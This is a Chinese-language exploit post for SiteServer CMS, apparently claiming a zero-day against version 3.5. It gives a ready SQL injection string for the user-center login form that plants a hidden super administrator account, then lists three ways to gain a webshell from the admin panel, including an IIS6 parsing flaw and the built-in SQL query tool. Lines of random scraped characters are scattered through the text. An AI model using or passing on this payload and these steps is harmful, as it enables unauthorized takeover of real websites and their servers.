SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

5 \$ n' e# ?. jstieserver官网:www.siteserver.cn
* M) e) h% }) r# k, j0 a, l- G' z8 b
8 v& Y6 p8 ~6 m6 e, b5 r) a
7 ]3 {. |; |/ S, H: T- h0 J
EXP:
! z& A3 Z( E. O* B2 I
直接访问UserCenter/login.aspx



6 [0 I! Q0 K9 P# b$ C- I! |用户名处输入：

123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--


" O# I/ Q/ W( K& `
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
& A7 q) D. d( X* y! {) x
" g! R, K* p8 p8 z; T% z0 T

之后再访问后台SiteServer/login.aspx用插入的用户登陆
" F+ ?) G$ R7 v9 Y8 s% G


后台拿webshell的三种方法：

一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

9 V7 ~3 _. v) a二、

成员权限-》添加用户-》用户名为：1.asp
* l) g" W$ o/ X+ T; ]
http://127.0.0.1/usercenter/
5 c, T7 B7 U0 K# W6 L
5 D0 B1 s7 E8 M9 a: n1 U0 w用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
( i. W" G  C7 t1 V: H) R
7 N/ k  U% ^4 [（ps：后台添加用户时不会验证是否含有非法字符）
5 S$ K! R) I# s* q
三、

& q5 ?7 Q6 K) ]4 j' M+ Z  @" q系统工具-》实用工具-》机器参数查看
1 ]' u4 N" ^  y3 P0 J* ~" q可以看到数据库类型、名称，WEB路径

! [. u! u, N' v系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

$ d% s: h$ Z* R6 e9 h; @